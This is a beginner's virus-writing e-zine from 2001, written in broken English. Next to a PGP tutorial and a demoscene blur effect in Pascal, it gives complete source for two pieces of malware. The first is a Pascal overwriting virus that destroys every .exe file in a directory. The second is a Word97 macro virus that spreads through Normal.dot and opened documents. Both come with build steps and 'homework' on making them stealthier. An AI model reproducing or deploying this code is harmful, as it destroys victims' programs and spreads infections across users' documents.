(my first e-zine) BKNY0NNX
(my first e-zine) BKNY0NNX // SBVC (c) 27.10.2001
MY FIRST E-ZINE
- My1Zine0.E00 - Index
- My1Zine0.E01 - Introduction
- My1Zine0.E02 - Writing the overwriting virus on Borland Pascal 7.00
- My1Zine0.E03 - Writing Word97-macrovirus for beginners
- My1Zine0.E04 - Using PGP
- My1Zine0.E04 - The creation of demos
Introduction
That you presently read, is unique in its sort by publishing in english language for beginning virmakers. It is intended for those, who can write program, but can't write viruses.
Think, this tiny journal you will help to make the jump from khiznyak before own ideas.
Why "MY FIRST E-ZINE" ? In exUSSR was published the series for children "My First Book".
Any constructive critiques is taken.
Send your own article and reviews!
Greetz to:
Gr.Protagor // SBVC Santa // SBVC GU // SBVC
Writing the overwriting virus on Borland Pascal 7.00
Writing the overwriting virus on Borland Pascal 7.00
You have solved to write the virus, but that it there was on-more simply and on-dangerous. I think that this will become you value ;)
The virus possible to write in any language, but I has chosen BP7, because of its simplicities and ample amount of programs on him.
The Algorithm of our most primitive virus is:
…---------------ª
|Open its file, |
|read viral body|
|and close it |
»------—--------º
…------œ--------ª
|Find first |
|victim |
»------—--------º
…------œ--------ª
|If not found |
| - |-----ø
| exit | |
»------—--------º |
|
…------œ----------ª |
|Open victim's | |
|file, write virus| |
|and close file | |
»------—----------º |
|
…------œ----------ª |
|Find next «----Ÿ
|victim |
»-----------------º
Essence its in that that it its body rewrites bodies of their own victims (rewriting AKA overwriter)
Here is and its source:
=====[CUT HERE]=====
(* Name of program *)
Program Trivial_1;
(* We shall use additional module, giving services for work with DOS *)
Uses Dos;
Const
BodySize = 2608; (* length of virus *)
Var
F : File; (* file variable for work with files *)
DirInfo : SearchRec; (* variable for searching for of files *)
Body : Array [1..BodySize] of Byte; (* vault of body of virus *)
BEGIN
Assign(F, ParamStr(0)); (* Preparation to opening itself: in ParamStr(0) - our name *)
Reset(F, 1); (* We Open... *)
BlockRead(F, Body, BodySize); (* We Read its body *)
Close(F); (* We Close itself *)
FindFirst('*.exe', AnyFile, DirInfo); (* We Search For first victim *)
While DosError = 0 Do Begin (* If it was sewn on... *)
Assign(F, DirInfo.Name); (* Preparation to opening of victim:
in DirInfo.Name - name of victim *)
ReWrite(F, 1); (* We Rewrite *)
BlockWrite(F, Body, BodySize); (* We write our body *)
Close(F); (* We close *)
FindNext(DirInfo); (* We Search For necessarying victim *)
End;
END.
=====[END CUT]======
The lines between =====[END HERE]===== and =====[END CUT]====== necessary to slice, write in file, and this file to compile by means of Borland (Turbo) Pascal 7.0. If length of got virus differs from BodySize, that BodySize to is necessary change on length of got virus and compile the virus.
Task on house: ;)
- Understand the code of virus;
- Change the code to if length of victim more lengths of virus, length of victim did not change.
Want the success!
Writing Word97-macrovirus for beginners
Writing Word97-macrovirus for beginners
All heard of that, that nigh only each infection accounts for macrovirus. You consider that writing of such virus too in a complicated way for beginning? Nowhere near! For this necessary only to know Visual Basic
In base of work of any macroviruses lies the events under different operations with document: opening, closing, conservation, seal... (The Full list refer to in "AntiViral ToolKit Pro Virus Encyclopedia by E.Kaspersky". That virus was able to infect necessary to process at least one event, eg. the Opening AKA Document_Open:
Sub Document_Open()
... there goes viral code ...
End Sub
The events, I think, you learned to process. Now necessary to copy the code of virus there, where necessary. In general, necessary to copy the code of virus in infected document (without this it is impossible ;) and Normal.dot - for activation under each start of Word.
As this is realized:
Copies macroses from Normal.dot to document:
If NT.Lines(1, 1) <> "'W97M" Then ' If NormalDot not infected then
NT.DeleteLines 1, NT.CountOfLines ' delete all line of code NT in him.
InsertLines 1, AD.Lines(1, AD.CountOfLines) ' and copies itself from ActiveDoc
End If
Copies macroses from document to normal.dot:
If AD.Lines(1, 1) <> "'W97M" Then ' If ActiveDoc not infected then
AD.DeleteLines 1, AD.CountOfLines ' delete all line of code AD in him
InsertLines 1, NT.Lines(1, NT.CountOfLines) ' and mines itself from NormalDot
End If
These fragments simply line by line copy code of virus if in its begin code stands commentary "W97M"
Yes, AD and NT whole only point to objects code:
- Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
- Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Better and more simply try to copy itself from victim to Normal.Dot conversely it from somewhere or other is yes copied ;)
STELTH-MECHANISMS are realized making the EMPTY HANDLERS of events on that events, which threaten to show viral code
Well and, certainly, remember to process the errors, eg.. so:
On Error Resume Next
Virus must spreads in any way :)
Well but here is code of YOURS virus:
'W97M
'Processing Opening of Victim
Sub Document_Open()
'Do not on errors
On Error Resume Next
'Install objects
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
'Copies itself from Normal to victim
If NT.Lines(1, 1) <> "'W97M" Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
End If
'Copies itself from victim to Normal
If AD.Lines(1, 1) <> "'W97M" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
'End!
End Sub
For preparing virus necessary:
- Create document in MS Word 97/2k and put there heap of text and pictures ;)
- Fall into editor VBA (Tools\Macro\Visual Basic Editor) or on Alt+F11
- In tree of project click twice by mouse Project\ThisDocument or F7
- Enter code of virus
- Save
The task on home: Write stealth
Good luck!
Using of the PGP
In this dock I will teach you how to use PGP.
The people always worry safety of its information i.e. inaccessibility it for someone else eye.
Well but PGP - Pretty Good Privacy - coolest system of cryptooperation with open key, intended for secret of listing between itself users and not only ;)
THE MAIN DIFFERENCE of system a cryptooperation with open key from other systems of cryptooperation consists in that that are used TWO KEYS (the PAIR of KEYS) instead of one - HIDDEN, by means of which YOU WILL DECIPHER the messages, sent you, and OPEN (PUBLIC), by means of which YOU WILL ENCODE the letters.
Yes - beside that, with whom you conduct correspondence, must be such version of PGP. For the best use PGP for DOS versions 2.6.
Hereinafter - all that happens to in quotes, type "steep word", is necessary print without "" :)
Installation PGP much forgive - unarchivate/copy the kit of supply PGP somewhere. Well and begin to use. Is it in the same way recommended install the variable encirclement named "TZ" in that temporary zone, in which you inhere, for exact time. For Moscow this will as
SET TZ=MSK
It's recommended install the variable encirclement named "PGP" on directory with files PGP.
To with you could correspond, you to is necessary create its pair of keys - open and secret. For this cause PGP with command line "-KG"
PGP.EXE -KG
Hereinafter you will is given the question about length of key. You may simply type one of the that numbers, which you have offerred, but better type 2048 - greatly possible length of key.
You will is given the question, on who create the keys. All that you will put in arrows of type "<" and ">", will simply be additional information, eg. the mailbox.
The Example:
Your Very Kewl Alias <alias.microsoft@chat.com>
Hereinafter you will be necessary to enter its password, which you will use. Then is necessary to repeat entering of password. KEEP THIS PASSWORD IN MEMORY!
Now PGP necessary casual numbers. Their it will get from gaps of time between striking on buttons. Blanch fist on keyoard before beeping :)
Yaeh... Beside you came up for directory with PGP two files:
- pubring.pgp - all your in the future open keys. While only one key :)
- secring.pgp - your secret key. Nobody do not let's!
To with anyone correspond, you need its open key, but him - your.
Select its open key, having started PGP with parameters "-KXA YoursAlias"
PGP.EXE -KXA KewlAlias
Well and will enter the filename, in which you want to save its key. If you won't enter extension, that its name will "Name.ASC". Send this file who necessary and unnecessary ;)
With you have wanted someone correspond :) And has sent you its open key. Add its key in its ligament, having started PGP with parameters "-KA FullNameOfHisKey"
PGP.EXE -KA FullNameOfHisKey
So. That crypt file therefor, with whom you contact listing, simply start PGP with command line ---
--- for cryptooperation in text file "YourFile.ASC" -
"-EA YourFile TO_ID [[TO_ID2]...]"
PGP.EXE -EA YourFile TO_ID [TO_ID2]
--- for cryptooperation in binary file "YourFile.PGP" -
"-E YourFile TO_ID [[TO_ID2]...]"
PGP.EXE -E YourFile TO_ID [TO_ID2]
Possible lower the field TO_ID, but then grantee to is necessary will enter at question.
Got letter, its is necessary decipher, having started PGP with parameters "CryptedFileName".
PGP.EXE CryptedFileName
But will then enter your password.
Here is and summery of command lines. If see "[A]", that this signifies that using of "A" you get anything in text type, rather then using - in binary.
-KG create new key pair
-KA "FileName" adds key
-KX[A] "UsersName" "FileName" select key
-KR "UsersName" take away key
-E[A] "FileName" "TO_ID" ["TO_ID2" ["TO_ID3"]...] crypt "FileName"
-KV what keys here is
-H help
Crypt your data!!!
The creation of demos
Heh :) You have solved to write the demo. The good desire :) Begin with beginning. To write cool demo, is necessary to know, how to do the effects, from which, as from cubes, will be created all new and new demos. I shall consider only video-effects. Video-effects - transformation of scenes on some mathematical formulas.
One of the the most simplest effects - BLUR. Blur is the "washing" raster (the picture). THERE IS AVERAGE OF ARITHMETICAL COLOURS OF NEARBY POINTS IN BLUR POINT OF RASTER TO HER. I.E. YOU DRAW THE PICTURE AND FOR EACH POINT CONSIDER THE AVERAGE OF ARITHMETICAL COLOURS OF NEARBY POINTS TO HER.
And right here begins most interesting :) Well you have drawn picture and were taken consider a.arthm..... Here one begin to write got points in additional buffer, but other - straight in raster. In first event of change the raster for blur is parallel - it their does not see since does not change the source raster. In the second event a raster changes immediately, and algorithm much even sees and uses change. The first event - CLASSICAL (TRUE) BLUR, he has one defect - appearance "lattice". Beside the second, CHANGED BLUR, this defect no, and scene is washed away "softly".
Ä on ·™Æ´Ï™® to points you consider a.arthm.?! On four you get triangles, squares, on eight - lava :) Than more points you use for a.arthm., more so "soft" scene you get.
A little remember - got by a.arthm. possible to change - add to him anything, subtract, multiply, divide, change on mathematical laws...
Restrictions - your fantasy and your IQ :)
Hope, you have understood the theory. But now practice - coding.
We'll be code in 0x13 mode --- 320 * 200 * 8 bits
Yes, I do not use BGI - too slowly. Besides, for speedup of showing the raster all change pass in virtual screen(the usual array), but then given from he is copied stright in videomemory (for us - too usual array). But because of this arrays, in coordinate of point first goes Y, but then - X.
Using the virtual screen is called "DoubleBuffering".
Besides, I use the assembler insertions(between ASM and END), do not understand - nothing terrible, soon understand.
=====[CUT HERE]=====
(* Begin of source. *)
Program Blur1;
(* The description of constants. MaxX - maximum permit of raster on horizont,
MaxY - on vertical. FlameConst - the added to a.arthm number *)
Const
MaxX = 320;
MaxY = 200;
FlameConst = 1;
(* Description of variables. *)
Var
(* S - area of videomemory *)
S : Array [1..MaxY, 1..MaxX] of Byte Absolute $A000:0000;
(* VS - Virtual Screen [VS], is used for speedup of work *)
VS : Array [1..MaxY, 1..MaxX] of Byte;
(* Variable-counters of cycles *)
x, y : Integer;
(* The procedure of check a keystroke. Analogue kept in unit CRT, but I has
written it to not to connect this unit. *)
Function KeyPressed : Boolean;
Var rFlags : Boolean;
Label _Ok, _End;
begin
asm
mov ah, 1
int 16h
jz _Ok
mov rFlags, True
jmp _End
_Ok: mov rFlags, False
_End:
end;
KeyPressed := rFlags;
end;
(* Begin main *)
BEGIN
(* We initialize generator of psuedo-randomic numbers *)
Randomize;
(* We switch monitor to 0x13 mode *)
asm
mov ax, 13h
int 10h
end;
(* Fill VS by randomic colours *)
for x := 1 to MaxX do for y := 1 to MaxY do
VS[y,x] := Random(255);
(* We repeat the cycle... *)
Repeat
(* We pass all POSSIBLE for change the point. So such initial
and final importances of counters *)
for y := 2 to MaxY-1 do for x := 2 to MaxX-1 do
(* The most important moment - BLUR. So simply, but... *)
VS[y,x] := (VS[y-1,x-1] + VS[y-1,x-0] + VS[y-1,x+1] +
VS[y-0,x-1] + VS[y-0,x+1] +
VS[y+1,x-1] + VS[y+1,x-0] + VS[y+1,x+1])
div 8 + FlameConst;
(* Above we, for speedup of work, work with VS, but now from he
copies the raster to videomemory *)
for y := 1 to MaxY do for x := 1 to MaxX do S[y,x] := VS[y,x];
(* We Repeat cycle until will press key *)
Until KeyPressed;
(* We switch monitor to text mode *)
asm
mov ax, 3
int 10h
end;
(* The End *)
END.
=====[END CUT]======
Good luck!